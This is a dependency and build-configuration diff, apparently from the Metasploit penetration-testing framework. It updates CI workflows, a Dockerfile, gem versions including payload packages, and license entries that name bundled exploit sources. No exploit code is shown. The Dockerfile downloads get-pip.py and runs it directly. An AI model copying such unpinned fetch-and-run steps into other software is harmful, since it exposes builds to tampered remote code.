- name: Setup Ruby
env:
BUNDLE_WITHOUT: "coverage development"
BUNDLE_FORCE_RUBY_PLATFORM: true
uses: ruby/setup-ruby@v1
with:
ruby-version: ${{ matrix.ruby }}
bundler-cache: true
cache-version: 4
# Github actions with Ruby requires Bundler 2.2.18+
# https://github.com/ruby/setup-ruby/tree/d2b39ad0b52eca07d23f3aa14fdf2a3fcc1f411c#windows
bundler: 2.2.33
- name: acceptance
env:
SPEC_HELPER_LOAD_METASPLOIT: false
SPEC_OPTS: "--tag acceptance --require acceptance_spec_helper.rb --color --format documentation --format AllureRspec::RSpecFormatter"
# Unix run command:
# SPEC_HELPER_LOAD_METASPLOIT=false bundle exec ./spec/acceptance
# Windows cmd command:
# set SPEC_HELPER_LOAD_METASPLOIT=false
# bundle exec rspec .\spec\acceptance
# Note: rspec retry is intentionally not used, as it can cause issues with allure's reporting
# Additionally - flakey tests should be fixed or marked as flakey instead of silently retried
run: |
bundle exec rspec spec/acceptance/
- name: Archive results
if: always()
uses: actions/upload-artifact@v3
with:
# Provide a unique artifact for each matrix os, otherwise race conditions can lead to corrupt zips
name: raw-data-${{ matrix.meterpreter.name }}-${{ matrix.meterpreter.runtime_version }}-${{ matrix.os }}
path: tmp/allure-raw-data
# Generate a final report from the previous test results
report:
name: Generate report
needs: test
runs-on: ubuntu-latest
if: always()
steps:
- name: Checkout code
uses: actions/checkout@v3
if: always()
- name: Install system dependencies (Linux)
if: always()
run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
- name: Setup Ruby
if: always()
env:
BUNDLE_WITHOUT: "coverage development"
BUNDLE_FORCE_RUBY_PLATFORM: true
uses: ruby/setup-ruby@v1
with:
ruby-version: 3.0.2
bundler-cache: true
cache-version: 4
# Github actions with Ruby requires Bundler 2.2.18+
# https://github.com/ruby/setup-ruby/tree/d2b39ad0b52eca07d23f3aa14fdf2a3fcc1f411c#windows
bundler: 2.2.33
- uses: actions/download-artifact@v3
id: download
if: always()
with:
# Note: Not specifying a name will download all artifacts from the previous workflow jobs
path: raw-data
- name: allure generate
if: always()
run: |
export VERSION=2.22.1
curl -o allure-$VERSION.tgz -Ls https://github.com/allure-framework/allure2/releases/download/$VERSION/allure-$VERSION.tgz
tar -zxvf allure-$VERSION.tgz -C .
ls -la ${{steps.download.outputs.download-path}}
./allure-$VERSION/bin/allure generate ${{steps.download.outputs.download-path}}/* -o ./allure-report
find ${{steps.download.outputs.download-path}}
bundle exec ruby tools/dev/report_generation/support_matrix/generate.rb --allure-data ${{steps.download.outputs.download-path}} > ./allure-report/support_matrix.html
- name: archive results
if: always()
uses: actions/upload-artifact@v3
with:
name: final-report-${{ github.run_id }}
path: |
./allure-report
+2 -2
View File
@@ -67,7 +67,7 @@ jobs:
- '3.0'
- '3.1'
- '3.2'
- '3.3.0-preview1'
- '3.3.0-preview2'
os:
- ubuntu-20.04
- ubuntu-latest
@@ -90,7 +90,7 @@ jobs:
name: ${{ matrix.os }} - Ruby ${{ matrix.ruby }} - ${{ matrix.test_cmd }}
steps:
- name: Install system dependencies
run: sudo apt-get install libpcap-dev graphviz
run: sudo apt-get install -y --no-install-recommends libpcap-dev graphviz
- name: Checkout code
uses: actions/checkout@v3
+4
View File
@@ -22,6 +22,7 @@ require:
- ./lib/rubocop/cop/lint/module_disclosure_date_present.rb
- ./lib/rubocop/cop/lint/deprecated_gem_version.rb
- ./lib/rubocop/cop/lint/module_enforce_notes.rb
- ./lib/rubocop/cop/lint/detect_invalid_pack_directives.rb
Layout/SpaceBeforeBrackets:
Description: >-
@@ -166,6 +167,9 @@ Layout/ModuleHashValuesOnSameLine:
Layout/ModuleDescriptionIndentation:
Enabled: true
Lint/DetectInvalidPackDirectives:
Enabled: true
Lint/ModuleDisclosureDateFormat:
Enabled: true
+6 -6
View File
@@ -43,9 +43,9 @@ RUN apk add --no-cache \
ENV GO111MODULE=off
RUN mkdir -p $TOOLS_HOME/bin && \
cd $TOOLS_HOME/bin && \
curl -O https://dl.google.com/go/go1.19.3.src.tar.gz && \
tar -zxf go1.19.3.src.tar.gz && \
rm go1.19.3.src.tar.gz && \
curl -O https://dl.google.com/go/go1.21.1.src.tar.gz && \
tar -zxf go1.21.1.src.tar.gz && \
rm go1.21.1.src.tar.gz && \
cd go/src && \
./make.bash
@@ -61,8 +61,8 @@ ENV METASPLOIT_GROUP=metasploit
RUN addgroup -S $METASPLOIT_GROUP
RUN apk add --no-cache bash sqlite-libs nmap nmap-scripts nmap-nselibs \
postgresql-libs python2 python3 py3-pip ncurses libcap su-exec alpine-sdk \
python2-dev openssl-dev nasm mingw-w64-gcc
postgresql-libs python3 py3-pip ncurses libcap su-exec alpine-sdk \
openssl-dev nasm mingw-w64-gcc
RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby)
RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which nmap)
@@ -75,7 +75,7 @@ RUN chown -R root:metasploit $APP_HOME/
RUN chmod 664 $APP_HOME/Gemfile.lock
RUN gem update --system
RUN cp -f $APP_HOME/docker/database.yml $APP_HOME/config/database.yml
RUN curl -L -O https://github.com/pypa/get-pip/raw/3843bff3a0a61da5b63ea0b7d34794c5c51a2f11/get-pip.py && python get-pip.py && rm get-pip.py
RUN curl -L -O https://raw.githubusercontent.com/pypa/get-pip/f84b65709d4b20221b7dbee900dbf9985a81b5d4/public/get-pip.py && python3 get-pip.py && rm get-pip.py
RUN pip install impacket
RUN pip install requests
+8 -4
View File
@@ -31,20 +31,24 @@ group :development do
end
group :development, :test do
# automatically include factories from spec/factories
gem 'factory_bot_rails'
# Make rspec output shorter and more useful
gem 'fivemat'
# running documentation generation tasks and rspec tasks
gem 'rake'
# Define `rake spec`. Must be in development AND test so that its available by default as a rake test when the
# environment is development
gem 'rspec-rails'
gem 'rspec-rerun'
# Required during CI as well local development
gem 'rubocop'
end
group :test do
# automatically include factories from spec/factories
gem 'test-prof'
gem 'factory_bot_rails'
# Make rspec output shorter and more useful
gem 'fivemat'
# rspec formatter for acceptance tests
gem 'allure-rspec'
# Manipulate Time.now in specs
gem 'timecop'
end
+139 -102
View File
@@ -1,11 +1,12 @@
PATH
remote: .
specs:
metasploit-framework (6.3.25)
actionpack (~> 7.0)
activerecord (~> 7.0)
activesupport (~> 7.0)
metasploit-framework (6.3.40)
actionpack (~> 7.0.0)
activerecord (~> 7.0.0)
activesupport (~> 7.0.0)
aws-sdk-ec2
aws-sdk-ec2instanceconnect
aws-sdk-iam
aws-sdk-s3
aws-sdk-ssm
@@ -25,19 +26,20 @@ PATH
filesize
hrr_rb_ssh-ed25519
http-cookie
irb
irb (~> 1.7.4)
jsobfu
json
metasm
metasploit-concern
metasploit-credential
metasploit-model
metasploit-payloads (= 2.0.148)
metasploit-payloads (= 2.0.156)
metasploit_data_models
metasploit_payloads-mettle (= 1.0.20)
metasploit_payloads-mettle (= 1.0.26)
mqtt
msgpack (~> 1.6.0)
nessus_rest
net-imap
net-ldap
net-smtp
net-ssh
@@ -77,6 +79,7 @@ PATH
rex-text
rex-zip
ruby-macho
ruby-mysql
ruby_smb (~> 3.2.0)
rubyntlm
rubyzip
@@ -100,61 +103,73 @@ GEM
remote: https://rubygems.org/
specs:
Ascii85 (1.1.0)
actionpack (7.0.5)
actionview (= 7.0.5)
activesupport (= 7.0.5)
actionpack (7.0.8)
actionview (= 7.0.8)
activesupport (= 7.0.8)
rack (~> 2.0, >= 2.2.4)
rack-test (>= 0.6.3)
rails-dom-testing (~> 2.0)
rails-html-sanitizer (~> 1.0, >= 1.2.0)
actionview (7.0.5)
activesupport (= 7.0.5)
actionview (7.0.8)
activesupport (= 7.0.8)
builder (~> 3.1)
erubi (~> 1.4)
rails-dom-testing (~> 2.0)
rails-html-sanitizer (~> 1.1, >= 1.2.0)
activemodel (7.0.5)
activesupport (= 7.0.5)
activerecord (7.0.5)
activemodel (= 7.0.5)
activesupport (= 7.0.5)
activesupport (7.0.5)
activemodel (7.0.8)
activesupport (= 7.0.8)
activerecord (7.0.8)
activemodel (= 7.0.8)
activesupport (= 7.0.8)
activesupport (7.0.8)
concurrent-ruby (~> 1.0, >= 1.0.2)
i18n (>= 1.6, < 2)
minitest (>= 5.1)
tzinfo (~> 2.0)
addressable (2.8.4)
addressable (2.8.5)
public_suffix (>= 2.0.2, < 6.0)
afm (0.2.2)
allure-rspec (2.23.0)
allure-ruby-commons (= 2.23.0)
rspec-core (>= 3.8, < 4)
allure-ruby-commons (2.23.0)
mime-types (>= 3.3, < 4)
require_all (>= 2, < 4)
rspec-expectations (~> 3.12)
uuid (>= 2.3, < 3)
arel-helpers (2.14.0)
activerecord (>= 3.1.0, < 8)
ast (2.4.2)
aws-eventstream (1.2.0)
aws-partitions (1.776.0)
aws-sdk-core (3.174.0)
aws-partitions (1.834.0)
aws-sdk-core (3.185.1)
aws-eventstream (~> 1, >= 1.0.2)
aws-partitions (~> 1, >= 1.651.0)
aws-sigv4 (~> 1.5)
jmespath (~> 1, >= 1.6.1)
aws-sdk-ec2 (1.382.0)
aws-sdk-core (~> 3, >= 3.174.0)
aws-sdk-ec2 (1.411.0)
aws-sdk-core (~> 3, >= 3.184.0)
aws-sigv4 (~> 1.1)
aws-sdk-iam (1.79.0)
aws-sdk-core (~> 3, >= 3.174.0)
aws-sdk-ec2instanceconnect (1.34.0)
aws-sdk-core (~> 3, >= 3.184.0)
aws-sigv4 (~> 1.1)
aws-sdk-kms (1.66.0)
aws-sdk-core (~> 3, >= 3.174.0)
aws-sdk-iam (1.87.0)
aws-sdk-core (~> 3, >= 3.184.0)
aws-sigv4 (~> 1.1)
aws-sdk-s3 (1.123.1)
aws-sdk-core (~> 3, >= 3.174.0)
aws-sdk-kms (1.72.0)
aws-sdk-core (~> 3, >= 3.184.0)
aws-sigv4 (~> 1.1)
aws-sdk-s3 (1.136.0)
aws-sdk-core (~> 3, >= 3.181.0)
aws-sdk-kms (~> 1)
aws-sigv4 (~> 1.4)
aws-sdk-ssm (1.151.0)
aws-sdk-core (~> 3, >= 3.174.0)
aws-sigv4 (~> 1.6)
aws-sdk-ssm (1.158.0)
aws-sdk-core (~> 3, >= 3.184.0)
aws-sigv4 (~> 1.1)
aws-sigv4 (1.5.2)
aws-sigv4 (1.6.0)
aws-eventstream (~> 1, >= 1.0.2)
bcrypt (3.1.18)
base64 (0.1.1)
bcrypt (3.1.19)
bcrypt_pbkdf (1.1.0)
bindata (2.4.15)
bootsnap (1.16.0)
@@ -168,6 +183,7 @@ GEM
cookiejar (0.3.3)
crass (1.0.6)
daemons (1.4.1)
date (3.3.3)
debug (1.8.0)
irb (>= 1.5.0)
reline (>= 0.3.1)
@@ -193,18 +209,19 @@ GEM
factory_bot_rails (6.2.0)
factory_bot (~> 6.2.0)
railties (>= 5.0.0)
faker (3.2.0)
faker (3.2.1)
i18n (>= 1.8.11, < 2)
faraday (2.7.6)
faraday (2.7.11)
base64
faraday-net_http (>= 2.0, < 3.1)
ruby2_keywords (>= 0.0.4)
faraday-net_http (3.0.2)
faraday-retry (2.2.0)
faraday (~> 2.0)
faye-websocket (0.11.2)
faye-websocket (0.11.3)
eventmachine (>= 0.12.0)
websocket-driver (>= 0.5.1)
ffi (1.15.5)
ffi (1.16.3)
filesize (0.2.0)
fivemat (1.3.7)
gssapi (1.3.1)
@@ -224,12 +241,13 @@ GEM
i18n (1.14.1)
concurrent-ruby (~> 1.0)
io-console (0.6.0)
irb (1.7.0)
reline (>= 0.3.0)
irb (1.7.4)
reline (>= 0.3.6)
jmespath (1.6.2)
jsobfu (0.4.2)
rkelly-remix
json (2.6.3)
language_server-protocol (3.17.0.3)
little-plugger (1.1.4)
logging (2.3.1)
little-plugger (~> 1.1)
@@ -237,14 +255,16 @@ GEM
loofah (2.21.3)
crass (~> 1.0.2)
nokogiri (>= 1.12.0)
macaddr (1.7.2)
systemu (~> 2.6.5)
memory_profiler (1.0.1)
metasm (1.0.5)
metasploit-concern (5.0.1)
metasploit-concern (5.0.2)
activemodel (~> 7.0)
activesupport (~> 7.0)
railties (~> 7.0)
zeitwerk
metasploit-credential (6.0.5)
metasploit-credential (6.0.6)
metasploit-concern
metasploit-model
metasploit_data_models (>= 5.0.0)
@@ -254,12 +274,12 @@ GEM
rex-socket
rubyntlm
rubyzip
metasploit-model (5.0.1)
metasploit-model (5.0.2)
activemodel (~> 7.0)
activesupport (~> 7.0)
railties (~> 7.0)
metasploit-payloads (2.0.148)
metasploit_data_models (6.0.2)
metasploit-payloads (2.0.156)
metasploit_data_models (6.0.3)
activerecord (~> 7.0)
activesupport (~> 7.0)
arel-helpers
@@ -269,23 +289,29 @@ GEM
railties (~> 7.0)
recog
webrick
metasploit_payloads-mettle (1.0.20)
metasploit_payloads-mettle (1.0.26)
method_source (1.0.0)
mini_portile2 (2.8.2)
minitest (5.18.0)
mime-types (3.5.1)
mime-types-data (~> 3.2015)
mime-types-data (3.2023.1003)
mini_portile2 (2.8.4)
minitest (5.20.0)
mqtt (0.6.0)
msgpack (1.6.1)
multi_json (1.15.0)
mustermann (3.0.0)
ruby2_keywords (~> 0.0.1)
nessus_rest (0.1.6)
net-imap (0.4.0)
date
net-protocol
net-ldap (0.18.0)
net-protocol (0.2.1)
timeout
net-smtp (0.3.3)
net-smtp (0.4.0)
net-protocol
net-ssh (7.1.0)
network_interface (0.0.2)
net-ssh (7.2.0)
network_interface (0.0.4)
nexpose (7.3.0)
nio4r (2.5.9)
nokogiri (1.14.5)
@@ -301,7 +327,7 @@ GEM
packetfu (2.0.0)
pcaprub (~> 0.13.1)
parallel (1.23.0)
parser (3.2.2.3)
parser (3.2.2.4)
ast (~> 2.4.1)
racc
patch_finder (1.0.2)
@@ -312,31 +338,32 @@ GEM
hashery (~> 2.0)
ruby-rc4
ttfunk
pg (1.5.3)
pg (1.5.4)
pry (0.14.2)
coderay (~> 1.1)
method_source (~> 1.0)
pry-byebug (3.10.1)
byebug (~> 11.0)
pry (>= 0.13, < 0.15)
public_suffix (5.0.1)
puma (6.3.0)
public_suffix (5.0.3)
puma (6.4.0)
nio4r (~> 2.0)
racc (1.7.0)
rack (2.2.7)
rack-protection (3.0.6)
rack
racc (1.7.1)
rack (2.2.8)
rack-protection (3.1.0)
rack (~> 2.2, >= 2.2.4)
rack-test (2.1.0)
rack (>= 1.3)
rails-dom-testing (2.0.3)
activesupport (>= 4.2.0)
rails-dom-testing (2.2.0)
activesupport (>= 5.0.0)
minitest
nokogiri (>= 1.6)
rails-html-sanitizer (1.6.0)
loofah (~> 2.21)
nokogiri (~> 1.14)
railties (7.0.5)
actionpack (= 7.0.5)
activesupport (= 7.0.5)
railties (7.0.8)
actionpack (= 7.0.8)
activesupport (= 7.0.8)
method_source
rake (>= 12.2)
thor (~> 1.0)
@@ -346,61 +373,62 @@ GEM
rasn1 (0.12.1)
strptime (~> 0.2.5)
rb-readline (0.5.5)
recog (3.1.1)
recog (3.1.2)
nokogiri
redcarpet (3.6.0)
regexp_parser (2.8.0)
reline (0.3.5)
regexp_parser (2.8.1)
reline (0.3.8)
io-console (~> 0.5)
rex-arch (0.1.14)
require_all (3.0.0)
rex-arch (0.1.15)
rex-text
rex-bin_tools (0.1.8)
rex-bin_tools (0.1.9)
metasm
rex-arch
rex-core
rex-struct2
rex-text
rex-core (0.1.31)
rex-encoder (0.1.6)
rex-encoder (0.1.7)
metasm
rex-arch
rex-text
rex-exploitation (0.1.38)
rex-exploitation (0.1.39)
jsobfu
metasm
rex-arch
rex-encoder
rex-text
rexml
rex-java (0.1.6)
rex-mime (0.1.7)
rex-java (0.1.7)
rex-mime (0.1.8)
rex-text
rex-nop (0.1.2)
rex-nop (0.1.3)
rex-arch
rex-ole (0.1.7)
rex-ole (0.1.8)
rex-text
rex-powershell (0.1.97)
rex-powershell (0.1.99)
rex-random_identifier
rex-text
ruby-rc4
rex-random_identifier (0.1.10)
rex-random_identifier (0.1.11)
rex-text
rex-registry (0.1.4)
rex-rop_builder (0.1.4)
rex-registry (0.1.5)
rex-rop_builder (0.1.5)
metasm
rex-core
rex-text
rex-socket (0.1.52)
rex-socket (0.1.54)
rex-core
rex-sslscan (0.1.9)
rex-sslscan (0.1.10)
rex-core
rex-socket
rex-text
rex-struct2 (0.1.3)
rex-text (0.2.52)
rex-zip (0.1.4)
rex-struct2 (0.1.4)
rex-text (0.2.53)
rex-zip (0.1.5)
rex-text
rexml (3.2.5)
rexml (3.2.6)
rkelly-remix (0.0.7)
rspec (3.12.0)
rspec-core (~> 3.12.0)
@@ -411,7 +439,7 @@ GEM
rspec-expectations (3.12.3)
diff-lcs (>= 1.2.0, < 2.0)
rspec-support (~> 3.12.0)
rspec-mocks (3.12.5)
rspec-mocks (3.12.6)
diff-lcs (>= 1.2.0, < 2.0)
rspec-support (~> 3.12.0)
rspec-rails (6.0.3)
@@ -424,20 +452,23 @@ GEM
rspec-support (~> 3.12)
rspec-rerun (1.1.0)
rspec (~> 3.0)
rspec-support (3.12.0)
rubocop (1.52.0)
rspec-support (3.12.1)
rubocop (1.56.4)
base64 (~> 0.1.1)
json (~> 2.3)
language_server-protocol (>= 3.17.0)
parallel (~> 1.10)
parser (>= 3.2.0.0)
parser (>= 3.2.2.3)
rainbow (>= 2.2.2, < 4.0)
regexp_parser (>= 1.8, < 3.0)
rexml (>= 3.2.5, < 4.0)
rubocop-ast (>= 1.28.0, < 2.0)
rubocop-ast (>= 1.28.1, < 2.0)
ruby-progressbar (~> 1.7)
unicode-display_width (>= 2.4.0, < 3.0)
rubocop-ast (1.29.0)
parser (>= 3.2.1.0)
ruby-macho (3.0.0)
ruby-macho (4.0.0)
ruby-mysql (4.1.0)
ruby-prof (1.4.2)
ruby-progressbar (1.13.0)
ruby-rc4 (0.1.5)
@@ -459,24 +490,26 @@ GEM
simplecov-html (0.12.3)
simpleidn (0.2.1)
unf (~> 0.1.4)
sinatra (3.0.6)
sinatra (3.1.0)
mustermann (~> 3.0)
rack (~> 2.2, >= 2.2.4)
rack-protection (= 3.0.6)
rack-protection (= 3.1.0)
tilt (~> 2.0)
sqlite3 (1.6.3)
sqlite3 (1.6.6)
mini_portile2 (~> 2.8.0)
sshkey (2.0.0)
sshkey (3.0.0)
strptime (0.2.5)
swagger-blocks (3.0.0)
systemu (2.6.5)
test-prof (1.2.3)
thin (1.8.2)
daemons (~> 1.0, >= 1.0.9)
eventmachine (~> 1.0, >= 1.0.4)
rack (>= 1, < 3)
thor (1.2.2)
tilt (2.2.0)
timecop (0.9.6)
timeout (0.3.2)
tilt (2.3.0)
timecop (0.9.8)
timeout (0.4.0)
ttfunk (1.7.0)
tzinfo (2.0.6)
concurrent-ruby (~> 1.0)
@@ -485,12 +518,14 @@ GEM
unf (0.1.4)
unf_ext
unf_ext (0.0.8.2)
unicode-display_width (2.4.2)
unicode-display_width (2.5.0)
unix-crypt (1.3.1)
uuid (2.3.9)
macaddr (~> 1.0)
warden (1.2.9)
rack (>= 2.0.9)
webrick (1.8.1)
websocket-driver (0.7.5)
websocket-driver (0.7.6)
websocket-extensions (>= 0.1.0)
websocket-extensions (0.1.5)
win32api (0.1.0)
@@ -507,15 +542,16 @@ GEM
xdr (3.0.3)
activemodel (>= 4.2, < 8.0)
activesupport (>= 4.2, < 8.0)
xmlrpc (0.3.2)
xmlrpc (0.3.3)
webrick
yard (0.9.34)
zeitwerk (2.6.8)
zeitwerk (2.6.12)
PLATFORMS
ruby
DEPENDENCIES
allure-rspec
debug (>= 1.0.0)
factory_bot_rails
fivemat
@@ -530,6 +566,7 @@ DEPENDENCIES
rubocop
ruby-prof (= 1.4.2)
simplecov (= 0.18.2)
test-prof
timecop
yard
+17
View File
@@ -21,6 +21,11 @@ Copyright: 2007 Roland Bouman
License: LGPL-2.1
Purpose: These files are used in exploits/multi/mysql/mysql_udf_payload.rb
Files: data/exploits/cve-2023-34634/test.png
Copyright: 2023 Brendan Watters
License: MIT
Purpose: These image is used as the default file to embed the exploit command.
Files: data/headers/windows/c_payload_util/beacon.h
Copyright: 2022, Copyright Help/Systems LLC and its group of companies.
License: Apache 2.0
@@ -44,6 +49,11 @@ Files: data/webcam/api.js
Copyright: Copyright 2013 Muaz Khan<@muazkh>.
License: MIT
Files: data/wordlists/flask_secret_keys.txt
Source: https://github.com/Paradoxis/Flask-Unsign-Wordlist/blob/v2023.34/flask_unsign_wordlist/wordlists/github.txt
Copyright: Copyright (c) 2023 Luke Paris (Paradoxis)
License: MIT
Files: external/source/byakugan/*
Copyright: Lurene Grenier, 2009
License: BSD-3-clause
@@ -75,6 +85,13 @@ Files: exteneral/source/exploits/CVE-2022-26904/*
Copyright: 2022 Abdelhamid Naceri
License: MIT
Files: external/source/exploits/CVE-2023-36874/*
Copyright: 2023 Octoberfest7
License: MIT
Purpose: Library and error report file are required for calculating offsets to the correct
function calls to implement the exploit. The heavily modified C main is necessary
to create and trigger the exploit.
Files: external/source/exploits/drunkpotato/Common_Src_Files/spnegotokenhandler/*
Copyright: 2011 Jon Bringhurst
License: GNU GPL 2.0
+91 -76
View File
@@ -1,24 +1,28 @@
This file is auto-generated by tools/dev/update_gem_licenses.sh
Ascii85, 1.1.0, MIT
actionpack, 7.0.5, MIT
actionview, 7.0.5, MIT
activemodel, 7.0.5, MIT
activerecord, 7.0.5, MIT
activesupport, 7.0.5, MIT
addressable, 2.8.4, "Apache 2.0"
actionpack, 7.0.8, MIT
actionview, 7.0.8, MIT
activemodel, 7.0.8, MIT
activerecord, 7.0.8, MIT
activesupport, 7.0.8, MIT
addressable, 2.8.5, "Apache 2.0"
afm, 0.2.2, MIT
allure-rspec, 2.23.0, "Apache 2.0"
allure-ruby-commons, 2.23.0, "Apache 2.0"
arel-helpers, 2.14.0, MIT
ast, 2.4.2, MIT
aws-eventstream, 1.2.0, "Apache 2.0"
aws-partitions, 1.776.0, "Apache 2.0"
aws-sdk-core, 3.174.0, "Apache 2.0"
aws-sdk-ec2, 1.382.0, "Apache 2.0"
aws-sdk-iam, 1.79.0, "Apache 2.0"
aws-sdk-kms, 1.66.0, "Apache 2.0"
aws-sdk-s3, 1.123.1, "Apache 2.0"
aws-sdk-ssm, 1.151.0, "Apache 2.0"
aws-sigv4, 1.5.2, "Apache 2.0"
bcrypt, 3.1.18, MIT
aws-partitions, 1.834.0, "Apache 2.0"
aws-sdk-core, 3.185.1, "Apache 2.0"
aws-sdk-ec2, 1.411.0, "Apache 2.0"
aws-sdk-ec2instanceconnect, 1.34.0, "Apache 2.0"
aws-sdk-iam, 1.87.0, "Apache 2.0"
aws-sdk-kms, 1.72.0, "Apache 2.0"
aws-sdk-s3, 1.136.0, "Apache 2.0"
aws-sdk-ssm, 1.158.0, "Apache 2.0"
aws-sigv4, 1.6.0, "Apache 2.0"
base64, 0.1.1, "ruby, Simplified BSD"
bcrypt, 3.1.19, MIT
bcrypt_pbkdf, 1.1.0, MIT
bindata, 2.4.15, "Simplified BSD"
bootsnap, 1.16.0, MIT
@@ -32,6 +36,7 @@ concurrent-ruby, 1.2.2, MIT
cookiejar, 0.3.3, unknown
crass, 1.0.6, MIT
daemons, 1.4.1, MIT
date, 3.3.3, "ruby, Simplified BSD"
debug, 1.8.0, "ruby, Simplified BSD"
diff-lcs, 1.5.0, "MIT, Artistic-2.0, GPL-2.0+"
dnsruby, 1.70.0, "Apache 2.0"
@@ -44,12 +49,12 @@ erubi, 1.12.0, MIT
eventmachine, 1.2.7, "ruby, GPL-2.0"
factory_bot, 6.2.1, MIT
factory_bot_rails, 6.2.0, MIT
faker, 3.2.0, MIT
faraday, 2.7.6, MIT
faker, 3.2.1, MIT
faraday, 2.7.11, MIT
faraday-net_http, 3.0.2, MIT
faraday-retry, 2.2.0, MIT
faye-websocket, 0.11.2, "Apache 2.0"
ffi, 1.15.5, "New BSD"
faye-websocket, 0.11.3, "Apache 2.0"
ffi, 1.16.3, "New BSD"
filesize, 0.2.0, MIT
fivemat, 1.3.7, MIT
gssapi, 1.3.1, MIT
@@ -62,35 +67,40 @@ http_parser.rb, 0.8.0, MIT
httpclient, 2.8.3, ruby
i18n, 1.14.1, MIT
io-console, 0.6.0, "ruby, Simplified BSD"
irb, 1.7.0, "ruby, Simplified BSD"
irb, 1.7.4, "ruby, Simplified BSD"
jmespath, 1.6.2, "Apache 2.0"
jsobfu, 0.4.2, "New BSD"
json, 2.6.3, ruby
language_server-protocol, 3.17.0.3, MIT
little-plugger, 1.1.4, MIT
logging, 2.3.1, MIT
loofah, 2.21.3, MIT
macaddr, 1.7.2, ruby
memory_profiler, 1.0.1, MIT
metasm, 1.0.5, LGPL-2.1
metasploit-concern, 5.0.1, "New BSD"
metasploit-credential, 6.0.5, "New BSD"
metasploit-framework, 6.3.25, "New BSD"
metasploit-model, 5.0.1, "New BSD"
metasploit-payloads, 2.0.148, "3-clause (or ""modified"") BSD"
metasploit_data_models, 6.0.2, "New BSD"
metasploit_payloads-mettle, 1.0.20, "3-clause (or ""modified"") BSD"
metasploit-concern, 5.0.2, "New BSD"
metasploit-credential, 6.0.6, "New BSD"
metasploit-framework, 6.3.40, "New BSD"
metasploit-model, 5.0.2, "New BSD"
metasploit-payloads, 2.0.156, "3-clause (or ""modified"") BSD"
metasploit_data_models, 6.0.3, "New BSD"
metasploit_payloads-mettle, 1.0.26, "3-clause (or ""modified"") BSD"
method_source, 1.0.0, MIT
mini_portile2, 2.8.2, MIT
minitest, 5.18.0, MIT
mime-types, 3.5.1, MIT
mime-types-data, 3.2023.1003, MIT
mini_portile2, 2.8.4, MIT
minitest, 5.20.0, MIT
mqtt, 0.6.0, MIT
msgpack, 1.6.1, "Apache 2.0"
multi_json, 1.15.0, MIT
mustermann, 3.0.0, MIT
nessus_rest, 0.1.6, MIT
net-imap, 0.4.0, "ruby, Simplified BSD"
net-ldap, 0.18.0, MIT
net-protocol, 0.2.1, "ruby, Simplified BSD"
net-smtp, 0.3.3, "ruby, Simplified BSD"
net-ssh, 7.1.0, MIT
network_interface, 0.0.2, MIT
net-smtp, 0.4.0, "ruby, Simplified BSD"
net-ssh, 7.2.0, MIT
network_interface, 0.0.4, MIT
nexpose, 7.3.0, "New BSD"
nio4r, 2.5.9, MIT
nokogiri, 1.14.5, MIT
@@ -101,60 +111,62 @@ openssl-cmac, 2.0.2, MIT
openvas-omp, 0.0.4, MIT
packetfu, 2.0.0, "New BSD"
parallel, 1.23.0, MIT
parser, 3.2.2.3, MIT
parser, 3.2.2.4, MIT
patch_finder, 1.0.2, "New BSD"
pcaprub, 0.13.1, LGPL-2.1
pdf-reader, 2.11.0, MIT
pg, 1.5.3, "Simplified BSD"
pg, 1.5.4, "Simplified BSD"
pry, 0.14.2, MIT
pry-byebug, 3.10.1, MIT
public_suffix, 5.0.1, MIT
puma, 6.3.0, "New BSD"
racc, 1.7.0, "ruby, Simplified BSD"
rack, 2.2.7, MIT
rack-protection, 3.0.6, MIT
public_suffix, 5.0.3, MIT
puma, 6.4.0, "New BSD"
racc, 1.7.1, "ruby, Simplified BSD"
rack, 2.2.8, MIT
rack-protection, 3.1.0, MIT
rack-test, 2.1.0, MIT
rails-dom-testing, 2.0.3, MIT
rails-dom-testing, 2.2.0, MIT
rails-html-sanitizer, 1.6.0, MIT
railties, 7.0.5, MIT
railties, 7.0.8, MIT
rainbow, 3.1.1, MIT
rake, 13.0.6, MIT
rasn1, 0.12.1, MIT
rb-readline, 0.5.5, BSD
recog, 3.1.1, unknown
recog, 3.1.2, unknown
redcarpet, 3.6.0, MIT
regexp_parser, 2.8.0, MIT
reline, 0.3.5, ruby
rex-arch, 0.1.14, "New BSD"
rex-bin_tools, 0.1.8, "New BSD"
regexp_parser, 2.8.1, MIT
reline, 0.3.8, ruby
require_all, 3.0.0, MIT
rex-arch, 0.1.15, "New BSD"
rex-bin_tools, 0.1.9, "New BSD"
rex-core, 0.1.31, "New BSD"
rex-encoder, 0.1.6, "New BSD"
rex-exploitation, 0.1.38, "New BSD"
rex-java, 0.1.6, "New BSD"
rex-mime, 0.1.7, "New BSD"
rex-nop, 0.1.2, "New BSD"
rex-ole, 0.1.7, "New BSD"
rex-powershell, 0.1.97, "New BSD"
rex-random_identifier, 0.1.10, "New BSD"
rex-registry, 0.1.4, "New BSD"
rex-rop_builder, 0.1.4, "New BSD"
rex-socket, 0.1.52, "New BSD"
rex-sslscan, 0.1.9, "New BSD"
rex-struct2, 0.1.3, "New BSD"
rex-text, 0.2.52, "New BSD"
rex-zip, 0.1.4, "New BSD"
rexml, 3.2.5, "Simplified BSD"
rex-encoder, 0.1.7, "New BSD"
rex-exploitation, 0.1.39, "New BSD"
rex-java, 0.1.7, "New BSD"
rex-mime, 0.1.8, "New BSD"
rex-nop, 0.1.3, "New BSD"
rex-ole, 0.1.8, "New BSD"
rex-powershell, 0.1.99, "New BSD"
rex-random_identifier, 0.1.11, "New BSD"
rex-registry, 0.1.5, "New BSD"
rex-rop_builder, 0.1.5, "New BSD"
rex-socket, 0.1.54, "New BSD"
rex-sslscan, 0.1.10, "New BSD"
rex-struct2, 0.1.4, "New BSD"
rex-text, 0.2.53, "New BSD"
rex-zip, 0.1.5, "New BSD"
rexml, 3.2.6, "Simplified BSD"
rkelly-remix, 0.0.7, MIT
rspec, 3.12.0, MIT
rspec-core, 3.12.2, MIT
rspec-expectations, 3.12.3, MIT
rspec-mocks, 3.12.5, MIT
rspec-mocks, 3.12.6, MIT
rspec-rails, 6.0.3, MIT
rspec-rerun, 1.1.0, MIT
rspec-support, 3.12.0, MIT
rubocop, 1.52.0, MIT
rspec-support, 3.12.1, MIT
rubocop, 1.56.4, MIT
rubocop-ast, 1.29.0, MIT
ruby-macho, 3.0.0, MIT
ruby-macho, 4.0.0, MIT
ruby-mysql, 4.1.0, MIT
